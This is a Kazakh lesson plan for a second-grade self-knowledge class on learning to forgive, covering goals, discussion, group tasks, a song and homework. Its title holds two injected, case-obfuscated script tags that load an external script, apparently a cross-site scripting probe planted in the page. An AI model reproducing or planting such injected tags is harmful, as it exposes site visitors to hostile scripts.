Өзін-өзі тану сабағының жоспары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.02.2021

Өзін-өзі тану сабағының жоспары

 

Мектеп: Вознесенка ОМ

Мерзiмі:  26.01.2021     

Тақырып:  Кешіре білуді үйренеміз

Құндылық: Дұрыс әрекет

Қасиеттер: Мейірімділік, кеңпейілділік, қайырымдылық

Мұғалiм:Агипа .Т

Cыныбы: 2  «А»    Оқушылар саны     

Сабақ мақсаты:

Оқушыларға кешіре білу туралы түсінік бере отырып, дұрыс әрекет құндылығының мәнін ашу.

Міндеттері:

  • Кешірімді болу, кешіре білу, кешірім сұрай білуді дұрыс әрекет құндылығымен байланыстыра отырып ұғындыру;
  • Мейірімділік, ризашылық, кішіпейілділік қасиеттерін дамыту;
  • Мейірімділікке, кішіпейілділікке тәрбиелеу.

Ресурстар: (құралдар, мәліметтер)

Кітап, дәптер, үнтаспа, ақ қағаздар, нақыл сөздер,

Сабақ барысы:

  1. Ұйымдастыру кезеңi.

Сәлемдесу, оқушылардың көңіл - күйін сұрау, сабаққа қатысуды тексеру. Бес «Т» тәртіп,талап,тыныштық,тазалық,татулық ережесімен таңыстыру.

  1. Жағымды күйге келу.

Нұрға бөлену:  Елесететіп көріңіз: .....

  1. Үй тапсырмасын тексеру.

«Шіріген картоп» өсиет әңгімесін оқып келу.

Ескертулер:

  1. Дәйексөз.           

 «Кешіре білген адам – күшті адам»   деген нақыл сөз бүгінгі сабағымызға дәйексөз болады. Дәйексөзді алдымен мұғалім өзі дауыстап оқиды. Сосын балаларға дауыстап оқуды ұсынады. Келесі кезекте ұл балалар қайталап оқиды. Содан соң қыздар қайталап айтады. Оқушылардан дәйексөздің мағынасын қалай түсінетіндерін сұрайды. Оқушылардың жауаптарын тыңдаған соң, мұғалім балалардың жауаптарына сүйене отырып, өзі қорытынды жасайды.

 

 

  1. Әңгiмелеу (сұхбат). 

  "Әңгімелесейік" айдарындағы мәтін-мазмұнының рухани-адамгершілік тереңдігін ашатын сұрақтар мен ұйымдастыра отырып, оқушылардың сабақтың құндылығы мен қасиеттерді дамытуға жағдай туғызады.  

Мәлімет оқулықта берілген.   

Мұғалімнің сыйы «Аңыз айту»

Оқушылар өз ойымен бөліседі.

 

 

  1. Шығармашылық іс-әрекет, топтық тапсырма.

1-тапсырма: Төменде берілген рөлдер бойынша жаңалықтар бағдарламасын дұрыс әрекетке негіздеп жасаңдар.

А) Зерттеуші тілші

Тәулік бойы кешірімділік жайлы орын алған оқиғалар туралы хабарлайды.

Ә) Теледидар жүргізушісі

Кешірімділік жайлы оқиға орнынан жиынтық ақпараттар ұсынады.

Б) Сұхбат алушы тілші

Әлемдегі барлық адамдар кешірімді болса, онда...

2- тапсырма: Кешіре білудің жолын жасаңдар. Дәптерге жазыңдар. Мысалы: қателікті мойындау, татуласуға бірінші қадам жасау, кішіпейіл болу, өзара түсінісу, өкпе-ренішті ұмыта білу.

Дәптермен жұмыс 

Дәптердегі тапсырмаларды орындау.

 

  1. Топпен ән айту.

"Бақытты балалар әні"

                                                           Сөзі: Ғ. Мүсіреповтікі

                                                            Әні: И. Нүсіпбаевтікі

 

  1. Үй тапсырмасы.

И. Василенконың «Өткел» атты әңгімесін оқып келу.

 

  1. Соңғы тыныштық сәті.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Просмотров: 640

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу